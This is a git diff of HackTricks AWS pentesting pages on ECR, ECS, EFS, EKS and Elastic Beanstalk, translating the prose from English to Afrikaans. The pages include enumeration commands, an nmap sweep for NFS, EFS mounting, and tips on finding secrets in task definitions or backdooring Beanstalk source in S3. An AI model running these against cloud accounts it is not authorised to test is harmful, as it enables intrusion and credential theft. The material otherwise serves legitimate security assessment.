@@ -68,39 +67,34 @@ aws ecr-public describe-repositories
 aws ecr get-registry-policy
 aws ecr get-repository-policy --repository-name <repo_name>
 ```
-
-#### Unauthenticated Enum
+#### Ongeauthentiseerde Enum
 
 {{#ref}}
 ../aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md
 {{#endref}}
 
-#### Privesc
+#### Privilege Verhoging
 
-In the following page you can check how to **abuse ECR permissions to escalate privileges**:
+In die volgende bladsy kan jy kyk hoe om **ECR-toestemmings te misbruik om voorregte te verhoog**:
 
 {{#ref}}
 ../aws-privilege-escalation/aws-ecr-privesc.md
 {{#endref}}
 
-#### Post Exploitation
+#### Post Exploitatie
 
 {{#ref}}
 ../aws-post-exploitation/aws-ecr-post-exploitation.md
 {{#endref}}
 
-#### Persistence
+#### Volharding
 
 {{#ref}}
 ../aws-persistence/aws-ecr-persistence.md
 {{#endref}}
 
-## References
+## Verwysings
 
 - [https://docs.aws.amazon.com/AmazonECR/latest/APIReference/Welcome.html](https://docs.aws.amazon.com/AmazonECR/latest/APIReference/Welcome.html)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md
index cbbf596fe..167a870a3 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md
@@ -4,31 +4,30 @@
 
 ## ECS
 
-### Basic Information
+### Basiese Inligting
 
-Amazon **Elastic Container Services** or ECS provides a platform to **host containerized applications in the cloud**. ECS has two **deployment** methods, **EC2** instance type and a **serverless** option, **Fargate**. The service **makes running containers in the cloud very easy and pain free**.
+Amazon **Elastic Container Services** of ECS bied 'n platform om **gecontaineriseerde toepassings in die wolk te huisves**. ECS het twee **ontplooiing** metodes, **EC2** instansie tipe en 'n **serverless** opsie, **Fargate**. Die diens **maak dit baie maklik en probleemloos om houers in die wolk te laat loop**.
 
-ECS operates using the following three building blocks: **Clusters**, **Services**, and **Task Definitions**.
+ECS werk met die volgende drie boublokke: **Clusters**, **Dienste**, en **Taak Definisies**.
 
-- **Clusters** are **groups of containers** that are running in the cloud. As previously mentioned, there are two launch types for containers, EC2 and Fargate. AWS defines the **EC2** launch type as allowing customers “to run \[their] containerized applications on a cluster of Amazon EC2 instances that \[they] **manage**”. **Fargate** is similar and is defined as “\[allowing] you to run your containerized applications **without the need to provision and manage** the backend infrastructure”.
-- **Services** are created inside a cluster and responsible for **running the tasks**. Inside a service definition **you define the number of tasks to run, auto scaling, capacity provider (Fargate/EC2/External),** **networking** information such as VPC’s, subnets, and security groups.
-  - There **2 types of applications**:
-    - **Service**: A group of tasks handling a long-running computing work that can be stopped and restarted. For example, a web application.
-    - **Task**: A standalone task that runs and terminates. For example, a batch job.
-  - Among the service applications, there are **2 types of service schedulers**:
-    - [**REPLICA**](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html): The replica scheduling strategy places and **maintains the desired number** of tasks across your cluster. If for some reason a task shut down, a new one is launched in the same or different node.
-    - [**DAEMON**](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html): Deploys exactly one task on each active container instance that has the needed requirements. There is no need to specify a desired number of tasks, a task placement strategy, or use Service Auto Scaling policies.
-- **Task Definitions** are responsible for **defining what containers will run** and the various parameters that will be configured with the containers such as **port mappings** with the host, **env variables**, Docker **entrypoint**...
-  - Check **env variables for sensitive info**!
+- **Clusters** is **groepe van houers** wat in die wolk loop. Soos voorheen genoem, is daar twee lanseringstipes vir houers, EC2 en Fargate. AWS definieer die **EC2** lanseringstype as diegene wat kliënte “toelaat om \[hul] gecontaineriseerde toepassings op 'n kluster van Amazon EC2 instansies wat \[hulle] **bestuur**” te laat loop. **Fargate** is soortgelyk en word gedefinieer as “\[wat] jou toelaat om jou gecontaineriseerde toepassings **sonder die behoefte om** die agtergrondinfrastruktuur te voorsien en te bestuur”.
+- **Dienste** word binne 'n kluster geskep en is verantwoordelik vir **die uitvoering van die take**. Binne 'n diensdefinisie **definieer jy die aantal take om te loop, outo-skaal, kapasiteitsverskaffer (Fargate/EC2/Buitenshuise),** **netwerk** inligting soos VPC’s, subnetwerke, en sekuriteitsgroepe.
+- Daar is **2 tipes toepassings**:
+- **Diens**: 'n groep take wat 'n langlopende rekenaarwerk hanteer wat gestop en herbegin kan word. Byvoorbeeld, 'n webtoepassing.
+- **Taak**: 'n standalone taak wat loop en beëindig. Byvoorbeeld, 'n batch werk.
+- Onder die diens toepassings, is daar **2 tipes diens skeduleerders**:
+- [**REPLICA**](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html): Die replika skeduleringstrategie plaas en **onderhou die gewenste aantal** take oor jou kluster. As om een of ander rede 'n taak afsluit, word 'n nuwe een in dieselfde of 'n ander node gelanseer.
+- [**DAEMON**](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html): Ontplooi presies een taak op elke aktiewe houerinstansie wat die nodige vereistes het. Daar is geen behoefte om 'n gewenste aantal take, 'n taak plasingstrategie, of diens outo-skaalbeleide te spesifiseer nie.
+- **Taak Definisies** is verantwoordelik vir **die definisie van watter houers sal loop** en die verskillende parameters wat saam met die houers geconfigureer sal word soos **poortkaarte** met die gasheer, **omgewing veranderlikes**, Docker **entrypoint**...
+- Kontroleer **omgewing veranderlikes vir sensitiewe inligting**!
 
-### Sensitive Data In Task Definitions
+### Sensitiewe Gegewens In Taak Definisies
 
-Task definitions are responsible for **configuring the actual containers that will be running in ECS**. Since task definitions define how containers will run, a plethora of information can be found within.
+Taak definisies is verantwoordelik vir **die konfigurasie van die werklike houers wat in ECS sal loop**. Aangesien taak definisies definieer hoe houers sal loop, kan 'n oorvloed van inligting daarin gevind word.
 
-Pacu can enumerate ECS (list-clusters, list-container-instances, list-services, list-task-definitions), it can also dump task definitions.
-
-### Enumeration
+Pacu kan ECS opnoem (lys-klusters, lys-houer-instanties, lys-dienste, lys-taak-definisies), dit kan ook taak definisies dump. 
 
+### Opname
 ```bash
 # Clusters info
 aws ecs list-clusters
@@ -52,35 +51,30 @@ aws ecs describe-tasks --cluster <cluster> --tasks <tasks>
 ## Look for env vars and secrets used from the task definition
 aws ecs describe-task-definition --task-definition <TASK_NAME>:<VERSION>
 ```
-
-### Unauthenticated Access
+### Ongeauthentiseerde Toegang
 
 {{#ref}}
 ../aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md
 {{#endref}}
 
-### Privesc
+### Privilege Verhoging
 
-In the following page you can check how to **abuse ECS permissions to escalate privileges**:
+In die volgende bladsy kan jy kyk hoe om **ECS-toestemmings te misbruik om privileges te verhoog**:
 
 {{#ref}}
 ../aws-privilege-escalation/aws-ecs-privesc.md
 {{#endref}}
 
-### Post Exploitation
+### Post Exploitatie
 
 {{#ref}}
 ../aws-post-exploitation/aws-ecs-post-exploitation.md
 {{#endref}}
 
-### Persistence
+### Volharding
 
 {{#ref}}
 ../aws-persistence/aws-ecs-persistence.md
 {{#endref}}
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-efs-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-efs-enum.md
index bcf4e58d4..c37f40dbe 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-efs-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-efs-enum.md
@@ -4,22 +4,21 @@
 
 ## EFS
 
-### Basic Information
+### Basiese Inligting
 
-Amazon Elastic File System (EFS) is presented as a **fully managed, scalable, and elastic network file system** by AWS. The service facilitates the creation and configuration of **file systems** that can be concurrently accessed by multiple EC2 instances and other AWS services. The key features of EFS include its ability to automatically scale without manual intervention, provision low-latency access, support high-throughput workloads, guarantee data durability, and seamlessly integrate with various AWS security mechanisms.
+Amazon Elastic File System (EFS) word aangebied as 'n **volledig bestuurde, skaalbare, en elastiese netwerk lêerstelsel** deur AWS. Die diens fasiliteer die skepping en konfigurasie van **lêerstelsels** wat gelyktydig deur verskeie EC2-instanties en ander AWS-dienste benader kan word. Die sleutelkenmerke van EFS sluit in sy vermoë om outomaties te skaal sonder handmatige ingryping, lae-latensie toegang te voorsien, hoë-deurvoer werklading te ondersteun, data-duursaamheid te waarborg, en naatloos te integreer met verskeie AWS-sekuriteitsmeganismes.
 
-By **default**, the EFS folder to mount will be **`/`** but it could have a **different name**.
+Deur **standaard** sal die EFS-gids om te monteer **`/`** wees, maar dit kan 'n **ander naam** hê.
 
-### Network Access
+### Netwerk Toegang
 
-An EFS is created in a VPC and would be **by default accessible in all the VPC subnetworks**. However, the EFS will have a Security Group. In order to **give access to an EC2** (or any other AWS service) to mount the EFS, it’s needed to **allow in the EFS security group an inbound NFS** (2049 port) **rule from the EC2 Security Group**.
+'n EFS word in 'n VPC geskep en sal **standaard toeganklik wees in al die VPC-subnetwerke**. Die EFS sal egter 'n Sekuriteitsgroep hê. Om **toegang te gee aan 'n EC2** (of enige ander AWS-diens) om die EFS te monteer, is dit nodig om **in die EFS-sekuriteitsgroep 'n inkomende NFS** (poort 2049) **reël van die EC2-sekuriteitsgroep toe te laat**.
 
-Without this, you **won't be able to contact the NFS service**.
+Sonder dit, **sal jy nie in staat wees om die NFS-diens te kontak nie**.
 
-For more information about how to do this check: [https://stackoverflow.com/questions/38632222/aws-efs-connection-timeout-at-mount](https://stackoverflow.com/questions/38632222/aws-efs-connection-timeout-at-mount)
-
-### Enumeration
+Vir meer inligting oor hoe om dit te doen, kyk: [https://stackoverflow.com/questions/38632222/aws-efs-connection-timeout-at-mount](https://stackoverflow.com/questions/38632222/aws-efs-connection-timeout-at-mount)
 
+### Enumerasie
 ```bash
 # Get filesystems and access policies (if any)
 aws efs describe-file-systems
@@ -39,12 +38,10 @@ aws efs describe-replication-configurations
 # Search for NFS in EC2 networks
 sudo nmap -T4 -Pn -p 2049 --open 10.10.10.0/20 # or /16 to be sure
 ```
-
 > [!CAUTION]
-> It might be that the EFS mount point is inside the same VPC but in a different subnet. If you want to be sure you find all **EFS points it would be better to scan the `/16` netmask**.
+> Dit mag wees dat die EFS-mountpunt binne dieselfde VPC is, maar in 'n ander subnet. As jy seker wil wees dat jy al die **EFS-punte vind, sal dit beter wees om die `/16` netmask te skandeer**.
 
 ### Mount EFS
-
 ```bash
 sudo mkdir /efs
 
@@ -58,70 +55,63 @@ sudo yum install amazon-efs-utils # If centos
 sudo apt-get install amazon-efs-utils # If ubuntu
 sudo mount -t efs <file-system-id/EFS DNS name>:/ /efs/
 ```
+### IAM Toegang
 
-### IAM Access
-
-By **default** anyone with **network access to the EFS** will be able to mount, **read and write it even as root user**. However, File System policies could be in place **only allowing principals with specific permissions** to access it.\
-For example, this File System policy **won't allow even to mount** the file system if you **don't have the IAM permission**:
-
+Deur **standaard** sal enigeen met **netwerktoegang tot die EFS** in staat wees om dit te monteer, **te lees en te skryf selfs as 'n wortelgebruiker**. egter, File System-beleide kan in plek wees **wat slegs hoofde met spesifieke toestemmings** toelaat om toegang te verkry.\
+Byvoorbeeld, hierdie File System-beleid **sal nie toelaat om selfs te monteer** die lêerstelsel as jy **nie die IAM-toestemming** het nie:
 ```json
 {
-  "Version": "2012-10-17",
-  "Id": "efs-policy-wizard-2ca2ba76-5d83-40be-8557-8f6c19eaa797",
-  "Statement": [
-    {
-      "Sid": "efs-statement-e7f4b04c-ad75-4a7f-a316-4e5d12f0dbf5",
-      "Effect": "Allow",
-      "Principal": {
-        "AWS": "*"
-      },
-      "Action": "",
-      "Resource": "arn:aws:elasticfilesystem:us-east-1:318142138553:file-system/fs-0ab66ad201b58a018",
-      "Condition": {
-        "Bool": {
-          "elasticfilesystem:AccessedViaMountTarget": "true"
-        }
-      }
-    }
-  ]
+"Version": "2012-10-17",
+"Id": "efs-policy-wizard-2ca2ba76-5d83-40be-8557-8f6c19eaa797",
+"Statement": [
+{
+"Sid": "efs-statement-e7f4b04c-ad75-4a7f-a316-4e5d12f0dbf5",
+"Effect": "Allow",
+"Principal": {
+"AWS": "*"
+},
+"Action": "",
+"Resource": "arn:aws:elasticfilesystem:us-east-1:318142138553:file-system/fs-0ab66ad201b58a018",
+"Condition": {
+"Bool": {
+"elasticfilesystem:AccessedViaMountTarget": "true"
+}
+}
+}
+]
 }
 ```
-
-Or this will **prevent anonymous access**:
+Of dit sal **anonieme toegang voorkom**:
 
 <figure><img src="../../../images/image (278).png" alt=""><figcaption></figcaption></figure>
 
-Note that to mount file systems protected by IAM you MUST use the type "efs" in the mount command:
-
+Let daarop dat jy die tipe "efs" in die monteeropdrag MOET gebruik om lêerstelsels wat deur IAM beskerm word te monteer:
 ```bash
 sudo mkdir /efs
 sudo mount -t efs -o tls,iam  <file-system-id/EFS DNS name>:/ /efs/
 # To use a different pforile from ~/.aws/credentials
 # You can use: -o tls,iam,awsprofile=namedprofile
 ```
+### Toegangspunte
 
-### Access Points
+**Toegangspunte** is **aansoek**-spesifieke toegangspunte **tot 'n EFS-lêerstelsel** wat dit makliker maak om aansoektoegang tot gedeelde datastelle te bestuur.
 
-**Access points** are **application**-specific entry points **into an EFS file system** that make it easier to manage application access to shared datasets.
-
-When you create an access point, you can **specify the owner and POSIX permissions** for the files and directories created through the access point. You can also **define a custom root directory** for the access point, either by specifying an existing directory or by creating a new one with the desired permissions. This allows you to **control access to your EFS file system on a per-application or per-user basis**, making it easier to manage and secure your shared file data.
-
-**You can mount the File System from an access point with something like:**
+Wanneer jy 'n toegangspunt skep, kan jy **die eienaar en POSIX-toestemmings** vir die lêers en gidse wat deur die toegangspunt geskep word, spesifiseer. Jy kan ook **'n pasgemaakte wortelgidse** vir die toegangspunt definieer, hetsy deur 'n bestaande gidse te spesifiseer of deur 'n nuwe een met die gewenste toestemmings te skep. Dit stel jou in staat om **toegang tot jou EFS-lêerstelsel op 'n per-aansoek of per-gebruiker basis te beheer**, wat dit makliker maak om jou gedeelde lêerdata te bestuur en te beveilig.
 
+**Jy kan die Lêerstelsel vanaf 'n toegangspunt monteer met iets soos:**
 ```bash
 # Use IAM if you need to use iam permissions
 sudo mount -t efs -o tls,[iam],accesspoint=<access-point-id> \
-    <file-system-id/EFS DNS> /efs/
+<file-system-id/EFS DNS> /efs/
 ```
-
 > [!WARNING]
-> Note that even trying to mount an access point you still need to be able to **contact the NFS service via network**, and if the EFS has a file system **policy**, you need **enough IAM permissions** to mount it.
+> Let daarop dat selfs om 'n toegangspunt te probeer monteer, jy steeds moet **kontak maak met die NFS-diens via netwerk**, en as die EFS 'n lêerstelsel **beleid** het, het jy **voldoende IAM-toestemmings** nodig om dit te monteer.
 
-Access points can be used for the following purposes:
+Toegangspunte kan vir die volgende doeleindes gebruik word:
 
-- **Simplify permissions management**: By defining a POSIX user and group for each access point, you can easily manage access permissions for different applications or users without modifying the underlying file system's permissions.
-- **Enforce a root directory**: Access points can restrict access to a specific directory within the EFS file system, ensuring that each application or user operates within its designated folder. This helps prevent accidental data exposure or modification.
-- **Easier file system access**: Access points can be associated with an AWS Lambda function or an AWS Fargate task, simplifying file system access for serverless and containerized applications.
+- **Vereenvoudig toestemmingsbestuur**: Deur 'n POSIX-gebruiker en -groep vir elke toegangspunt te definieer, kan jy maklik toegangstoestemmings vir verskillende toepassings of gebruikers bestuur sonder om die onderliggende lêerstelsel se toestemmings te wysig.
+- **Afgedwonge 'n wortelgids**: Toegangspunte kan toegang tot 'n spesifieke gids binne die EFS-lêerstelsel beperk, wat verseker dat elke toepassing of gebruiker binne sy aangewese vouer werk. Dit help om toevallige data-blootstelling of -wysiging te voorkom.
+- **Makliker lêerstelseltoegang**: Toegangspunte kan geassosieer word met 'n AWS Lambda-funksie of 'n AWS Fargate-taak, wat lêerstelseltoegang vir serverless en gekontaineriseerde toepassings vereenvoudig.
 
 ## Privesc
 
@@ -142,7 +132,3 @@ Access points can be used for the following purposes:
 {{#endref}}
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md
index a7ead6d10..081ca3968 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md
@@ -4,17 +4,16 @@
 
 ## EKS
 
-Amazon Elastic Kubernetes Service (Amazon EKS) is designed to eliminate the need for users to install, operate, and manage their own Kubernetes control plane or nodes. Instead, Amazon EKS manages these components, providing a simplified way to deploy, manage, and scale containerized applications using Kubernetes on AWS.
+Amazon Elastic Kubernetes Service (Amazon EKS) is ontwerp om die behoefte aan gebruikers te verwyder om hul eie Kubernetes-beheervlak of nodes te installeer, te bedryf en te bestuur. In plaas daarvan bestuur Amazon EKS hierdie komponente, wat 'n vereenvoudigde manier bied om gecontaineriseerde toepassings met behulp van Kubernetes op AWS te ontplooi, te bestuur en te skaal.
 
-Key aspects of Amazon EKS include:
+Belangrike aspekte van Amazon EKS sluit in:
 
-1. **Managed Kubernetes Control Plane**: Amazon EKS automates critical tasks such as patching, node provisioning, and updates.
-2. **Integration with AWS Services**: It offers seamless integration with AWS services for compute, storage, database, and security.
-3. **Scalability and Security**: Amazon EKS is designed to be highly available and secure, providing features such as automatic scaling and isolation by design.
-4. **Compatibility with Kubernetes**: Applications running on Amazon EKS are fully compatible with applications running on any standard Kubernetes environment.
+1. **Geverifieerde Kubernetes Beheervlak**: Amazon EKS outomatiseer kritieke take soos patching, node provisioning, en opdaterings.
+2. **Integrasie met AWS Dienste**: Dit bied naatlose integrasie met AWS-dienste vir berekening, stoor, databasis, en sekuriteit.
+3. **Skaalbaarheid en Sekuriteit**: Amazon EKS is ontwerp om hoogs beskikbaar en veilig te wees, wat funksies soos outomatiese skaal en isolasie deur ontwerp bied.
+4. **Compatibiliteit met Kubernetes**: Toepassings wat op Amazon EKS loop, is volledig versoenbaar met toepassings wat op enige standaard Kubernetes-omgewing loop.
 
 #### Enumeration
-
 ```bash
 aws eks list-clusters
 aws eks describe-cluster --name <cluster_name>
@@ -32,19 +31,14 @@ aws eks describe-nodegroup --cluster-name <c_name> --nodegroup-name <n_name>
 aws eks list-updates --name <name>
 aws eks describe-update --name <name> --update-id <id>
 ```
-
 #### Post Exploitation
 
 {{#ref}}
 ../aws-post-exploitation/aws-eks-post-exploitation.md
 {{#endref}}
 
-## References
+## Verwysings
 
 - [https://aws.amazon.com/eks/](https://aws.amazon.com/eks/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md
index 980504dac..115cfbd3b 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md
@@ -4,70 +4,69 @@
 
 ## Elastic Beanstalk
 
-Amazon Elastic Beanstalk provides a simplified platform for **deploying, managing, and scaling web applications and services**. It supports a variety of programming languages and frameworks, such as Java, .NET, PHP, Node.js, Python, Ruby, and Go, as well as Docker containers. The service is compatible with widely-used servers including Apache, Nginx, Passenger, and IIS.
+Amazon Elastic Beanstalk bied 'n vereenvoudigde platform vir **die ontplooiing, bestuur en skaal van webtoepassings en dienste**. Dit ondersteun 'n verskeidenheid programmering tale en raamwerke, soos Java, .NET, PHP, Node.js, Python, Ruby, en Go, sowel as Docker houers. Die diens is versoenbaar met wyd gebruikte bedieners insluitend Apache, Nginx, Passenger, en IIS.
 
-Elastic Beanstalk provides a simple and flexible way to **deploy your applications to the AWS cloud**, without the need to worry about the underlying infrastructure. It **automatically** handles the details of capacity **provisioning**, load **balancing**, **scaling**, and application health **monitoring**, allowing you to focus on writing and deploying your code.
+Elastic Beanstalk bied 'n eenvoudige en buigsame manier om **jou toepassings na die AWS wolk te ontplooi**, sonder om te bekommer oor die onderliggende infrastruktuur. Dit **hanteer outomaties** die besonderhede van kapasiteit **verskaffing**, las **balansering**, **skaal**, en toepassingsgesondheid **monitering**, wat jou toelaat om te fokus op die skryf en ontplooiing van jou kode.
 
-The infrastructure created by Elastic Beanstalk is managed by **Autoscaling** Groups in **EC2** (with a load balancer). Which means that at the end of the day, if you **compromise the host**, you should know about about EC2:
+Die infrastruktuur geskep deur Elastic Beanstalk word bestuur deur **Autoscaling** Groepe in **EC2** (met 'n lasbalanser). Dit beteken dat aan die einde van die dag, as jy **die gasheer kompromitteer**, jy moet weet van EC2:
 
 {{#ref}}
 aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/
 {{#endref}}
 
-Moreover, if Docker is used, it’s possible to use **ECS**.
+Boonop, as Docker gebruik word, is dit moontlik om **ECS** te gebruik.
 
 {{#ref}}
 aws-eks-enum.md
 {{#endref}}
 
-### Application & Environments
+### Toepassing & Omgewings
 
-In AWS Elastic Beanstalk, the concepts of an "application" and an "environment" serve different purposes and have distinct roles in the deployment process.
+In AWS Elastic Beanstalk, dien die konsepte van 'n "toepassing" en 'n "omgewing" verskillende doeleindes en het dit onderskeidende rolle in die ontplooiingsproses.
 
-#### Application
+#### Toepassing
 
-- An application in Elastic Beanstalk is a **logical container for your application's source code, environments, and configurations**. It groups together different versions of your application code and allows you to manage them as a single entity.
-- When you create an application, you provide a name and **description, but no resources are provisioned** at this stage. it is simply a way to organize and manage your code and related resources.
-- You can have **multiple application versions** within an application. Each version corresponds to a specific release of your code, which can be deployed to one or more environments.
+- 'n Toepassing in Elastic Beanstalk is 'n **logiese houer vir jou toepassing se bronkode, omgewings, en konfigurasies**. Dit groepeer verskillende weergawes van jou toepassingskode en laat jou toe om dit as 'n enkele entiteit te bestuur.
+- Wanneer jy 'n toepassing skep, verskaf jy 'n naam en **beskrywing, maar geen hulpbronne word op hierdie stadium verskaf**. Dit is eenvoudig 'n manier om jou kode en verwante hulpbronne te organiseer en te bestuur.
+- Jy kan **meervoudige toepassingsweergawes** binne 'n toepassing hê. Elke weergawe stem ooreen met 'n spesifieke vrystelling van jou kode, wat na een of meer omgewings ontplooi kan word.
 
-#### Environment
+#### Omgewing
 
-- An environment is a **provisioned instance of your application** running on AWS infrastructure. It is **where your application code is deployed and executed**. Elastic Beanstalk provisions the necessary resources (e.g., EC2 instances, load balancers, auto-scaling groups, databases) based on the environment configuration.
-- **Each environment runs a single version of your application**, and you can have multiple environments for different purposes, such as development, testing, staging, and production.
-- When you create an environment, you choose a platform (e.g., Java, .NET, Node.js, etc.) and an environment type (e.g., web server or worker). You can also customize the environment configuration to control various aspects of the infrastructure and application settings.
+- 'n Omgewing is 'n **verskafde instansie van jou toepassing** wat op AWS infrastruktuur loop. Dit is **waar jou toepassingskode ontplooi en uitgevoer word**. Elastic Beanstalk verskaf die nodige hulpbronne (bv. EC2 instansies, lasbalansers, outo-skaal groepe, databasisse) gebaseer op die omgewing konfigurasie.
+- **Elke omgewing loop 'n enkele weergawe van jou toepassing**, en jy kan verskeie omgewings vir verskillende doeleindes hê, soos ontwikkeling, toetsing, staging, en produksie.
+- Wanneer jy 'n omgewing skep, kies jy 'n platform (bv. Java, .NET, Node.js, ens.) en 'n omgewing tipe (bv. webbediener of werker). Jy kan ook die omgewing konfigurasie aanpas om verskeie aspekte van die infrastruktuur en toepassingsinstellings te beheer.
 
-### 2 types of Environments
+### 2 tipes Omgewings
 
-1. **Web Server Environment**: It is designed to **host and serve web applications and APIs**. These applications typically handle incoming HTTP/HTTPS requests. The web server environment provisions resources such as **EC2 instances, load balancers, and auto-scaling** groups to handle incoming traffic, manage capacity, and ensure the application's high availability.
-2. **Worker Environment**: It is designed to process **background tasks**, which are often time-consuming or resource-intensive operations that don't require immediate responses to clients. The worker environment provisions resources like **EC2 instances and auto-scaling groups**, but it **doesn't have a load balancer** since it doesn't handle HTTP/HTTPS requests directly. Instead, it consumes tasks from an **Amazon Simple Queue Service (SQS) queue**, which acts as a buffer between the worker environment and the tasks it processes.
+1. **Webbediener Omgewing**: Dit is ontwerp om **webtoepassings en API's te huisves en te bedien**. Hierdie toepassings hanteer tipies inkomende HTTP/HTTPS versoeke. Die webbediener omgewing verskaf hulpbronne soos **EC2 instansies, lasbalansers, en outo-skaal** groepe om inkomende verkeer te hanteer, kapasiteit te bestuur, en die hoë beskikbaarheid van die toepassing te verseker.
+2. **Werker Omgewing**: Dit is ontwerp om **agtergrond take** te verwerk, wat dikwels tydrowende of hulpbron-intensiewe operasies is wat nie onmiddellike reaksies aan kliënte vereis nie. Die werker omgewing verskaf hulpbronne soos **EC2 instansies en outo-skaal groepe**, maar dit **het nie 'n lasbalanser** nie aangesien dit nie HTTP/HTTPS versoeke direk hanteer nie. In plaas daarvan, verbruik dit take van 'n **Amazon Simple Queue Service (SQS) waglyn**, wat as 'n buffer tussen die werker omgewing en die take wat dit verwerk, dien.
 
-### Security
+### Sekuriteit
 
-When creating an App in Beanstalk there are 3 very important security options to choose:
+Wanneer jy 'n App in Beanstalk skep, is daar 3 baie belangrike sekuriteitsopsies om te kies:
 
-- **EC2 key pair**: This will be the **SSH key** that will be able to access the EC2 instances running the app
-- **IAM instance profile**: This is the **instance profile** that the instances will have (**IAM privileges**)
-  - The autogenerated role is called **`aws-elasticbeanstalk-ec2-role`** and has some interesting access over all ECS, all SQS, DynamoDB elasticbeanstalk and elasticbeanstalk S3 using the AWS managed policies: [AWSElasticBeanstalkWebTier](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkWebTier), [AWSElasticBeanstalkMulticontainerDocker](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkMulticontainerDocker), [AWSElasticBeanstalkWorkerTier](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkWorkerTier).
-- **Service role**: This is the **role that the AWS service** will use to perform all the needed actions. Afaik, a regular AWS user cannot access that role.
-  - This role generated by AWS is called **`aws-elasticbeanstalk-service-role`** and uses the AWS managed policies [AWSElasticBeanstalkEnhancedHealth](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/service-role/AWSElasticBeanstalkEnhancedHealth) and [AWSElasticBeanstalkManagedUpdatesCustomerRolePolicy](https://us-east-1.console.aws.amazon.com/iamv2/home?region=us-east-1#/roles/details/aws-elasticbeanstalk-service-role?section=permissions)
+- **EC2 sleutel paar**: Dit sal die **SSH sleutel** wees wat toegang tot die EC2 instansies wat die app loop, sal hê.
+- **IAM instansie profiel**: Dit is die **instansie profiel** wat die instansies sal hê (**IAM voorregte**).
+- Die outomaties gegenereerde rol word **`aws-elasticbeanstalk-ec2-role`** genoem en het 'n paar interessante toegang oor alle ECS, alle SQS, DynamoDB elasticbeanstalk en elasticbeanstalk S3 met behulp van die AWS bestuurde beleide: [AWSElasticBeanstalkWebTier](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkWebTier), [AWSElasticBeanstalkMulticontainerDocker](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkMulticontainerDocker), [AWSElasticBeanstalkWorkerTier](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkWorkerTier).
+- **Diens rol**: Dit is die **rol wat die AWS diens** sal gebruik om al die nodige aksies uit te voer. Afaik, 'n gewone AWS gebruiker kan nie toegang tot daardie rol kry nie.
+- Hierdie rol wat deur AWS gegenereer is, word **`aws-elasticbeanstalk-service-role`** genoem en gebruik die AWS bestuurde beleide [AWSElasticBeanstalkEnhancedHealth](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/service-role/AWSElasticBeanstalkEnhancedHealth) en [AWSElasticBeanstalkManagedUpdatesCustomerRolePolicy](https://us-east-1.console.aws.amazon.com/iamv2/home?region=us-east-1#/roles/details/aws-elasticbeanstalk-service-role?section=permissions)
 
-By default **metadata version 1 is disabled**:
+Standaard is **metadata weergawe 1 gedeaktiveer**:
 
 <figure><img src="../../../images/image (103).png" alt=""><figcaption></figcaption></figure>
 
-### Exposure
+### Blootstelling
 
-Beanstalk data is stored in a **S3 bucket** with the following name: **`elasticbeanstalk-<region>-<acc-id>`**(if it was created in the AWS console). Inside this bucket you will find the uploaded **source code of the application**.
+Beanstalk data word gestoor in 'n **S3 emmer** met die volgende naam: **`elasticbeanstalk-<region>-<acc-id>`** (as dit in die AWS konsole geskep is). Binne hierdie emmer sal jy die opgelaaide **bronkode van die toepassing** vind.
 
-The **URL** of the created webpage is **`http://<webapp-name>-env.<random>.<region>.elasticbeanstalk.com/`**
+Die **URL** van die geskepte webblad is **`http://<webapp-name>-env.<random>.<region>.elasticbeanstalk.com/`**
 
 > [!WARNING]
-> If you get **read access** over the bucket, you can **read the source code** and even find **sensitive credentials** on it
+> As jy **lees toegang** oor die emmer kry, kan jy **die bronkode lees** en selfs **sensitiewe akrediteer** daarop vind.
 >
-> if you get **write access** over the bucket, you could **modify the source code** to **compromise** the **IAM role** the application is using next time it's executed.
-
-### Enumeration
+> As jy **skryf toegang** oor die emmer kry, kan jy **die bronkode wysig** om die **IAM rol** wat die toepassing gebruik, die volgende keer wat dit uitgevoer word, te **kompromitteer**.
 
+### Enumerasie
 ```bash
 # Find S3 bucket
 ACCOUNT_NUMBER=<account_number>
@@ -85,33 +84,28 @@ aws elasticbeanstalk describe-instances-health --environment-name <env_name> # G
 # Get events
 aws elasticbeanstalk describe-events
 ```
-
